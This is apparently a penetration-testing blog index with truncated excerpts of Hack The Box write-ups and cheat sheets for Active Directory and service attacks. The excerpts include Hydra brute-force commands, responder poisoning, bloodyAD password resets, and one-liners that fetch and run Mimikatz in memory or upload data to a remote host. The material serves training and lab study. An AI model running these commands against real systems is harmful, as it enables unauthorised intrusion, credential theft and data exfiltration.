Welcome to 0pwn0's Blog

IntroductionInfiltrator is an Insane-difficulty Windows Active Directory machine that demonstrates a sophisticated attack chain involving username enumeration, Kerberos exploitation, Windows Remote Management (WinRM), and Active Directory certificate services abuse. The machine showcases real-world attack scenarios including password cracking, privilege escalation through Active Directory permissions, and exploitation of misconfigured certificate templates. Attack NarrativeThe penetration te...

Về thông tin Thông tin chung IP Address : 10.10.11.70 Hệ điều hành (Distribution) Microsoft Windows Server 2022 Standard Kernel OS Version 10.0.20348 N/A Build 20348 Phần mềm Web Server và Version Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) Port Available 53, 88, 111, 135, 139, 389, 445, 464, 593, 636, 2049, 3260, 3268, 3269, 5985 Enumeration (Thu thập dữ liệu)1As is common in real life pentests, you will start the Puppy box with credentials for the following account: lev...

IntroductionThis technical writeup details the penetration test of the “DarkCorp” machine from Hack The Box, rated as Insane difficulty. The assessment demonstrates a sophisticated attack chain involving a critical XSS vulnerability in Roundcube webmail, SQL injection in a dashboard application, Active Directory certificate services exploitation, and various privilege escalation techniques. Attack NarrativeThe following sections provide a detailed chronological account of the penetration tes...

Author of post: SeriotonCTF https://github.com/CravateRouge/bloodyAD Installation Using uv 1uv tool install bloodyAD Using pipx 1pipx install bloodyAD Retrieve User Information1bloodyAD --host $dc -d $domain -u $username -p $password get object $target_username Add User To Group1bloodyAD --host $dc -d $domain -u $username -p $password add groupMember $group_name $member_to_add Change Password1bloodyAD --host $dc -d $domain -u $username -p $password set password $target_username $new_pa...

Author of post: 0pwn https://github.com/ly4k/Certipy Installationhttps://github.com/ly4k/Certipy/wiki/04-%E2%80%90-Installation Using pip 1234sudo apt update && sudo apt install -y python3 python3-pippython3 -m venv certipy-venvsource certipy-venv/bin/activatepip install certipy-ad Using pipx 1pipx install -f "git+https://github.com/ly4k/Certipy.git" Using uv 1uv tool install git+https://github.com/ly4k/Certipy --force Attacks ESC1 ESC3 ESC4 ESC7 ESC8 ESC9 ESC13 ESC14 E...

Command Description sudo vim /etc/hosts Opens the /etc/hosts with vim to start adding hostnames sudo nmap -p 80,443,8000,8080,8180,8888,10000 --open -oA web_discovery -iL scope_list Runs an nmap scan using common web application ports based on a scope list (scope_list) and outputs to a file (web_discovery) in all formats (-oA) eyewitness --web -x web_discovery.xml -d <nameofdirectorytobecreated> Runs eyewitness using a file generated by an nmap scan (web_discovery.xml) and cre...

Initial Enumeration Command Description nslookup ns1.inlanefreight.com Used to query the domain name system and discover the IP address to domain name mapping of the target entered from a Linux-based host. sudo tcpdump -i ens224 Used to start capturing network packets on the network interface proceeding the -i option a Linux-based host. sudo responder -I ens224 -A Used to start responding to & analyzing LLMNR, NBT-NS and MDNS queries on the interface specified proceeding the -I o...

Attacking FTP Command Description ftp 192.168.2.142 Connecting to the FTP server using the ftp client. nc -v 192.168.2.142 21 Connecting to the FTP server using netcat. hydra -l user1 -P /usr/share/wordlists/rockyou.txt ftp://192.168.2.142 Brute-forcing the FTP service. Attacking SMB Command Description smbclient -N -L //10.129.14.128 Null-session testing against the SMB service. smbmap -H 10.129.14.128 Network share enumeration using smbmap. smbmap -H 10.129.14.128 -r no...

Hydra Command Description hydra -h hydra help hydra -C wordlist.txt SERVER_IP -s PORT http-get / Basic Auth Brute Force - Combined Wordlist hydra -L wordlist.txt -P wordlist.txt -u -f SERVER_IP -s PORT http-get / Basic Auth Brute Force - User/Pass Wordlists hydra -l admin -P wordlist.txt -f SERVER_IP -s PORT http-post-form "/login.php:username=^USER^&password=^PASS^:F=<form name='login'" Login Form Brute Force - Static User, Pass Wordlist hydra -L bi...

Command Description Invoke-WebRequest https://<snip>/PowerView.ps1 -OutFile PowerView.ps1 Download a file with PowerShell IEX (New-Object Net.WebClient).DownloadString('https://<snip>/Invoke-Mimikatz.ps1') Execute a file in memory using PowerShell Invoke-WebRequest -Uri http://10.10.10.32:443 -Method POST -Body $b64 Upload a file with PowerShell bitsadmin /transfer n http://10.10.10.32/nc.exe C:\Temp\nc.exe Download a file using Bitsadmin certutil.exe -verify...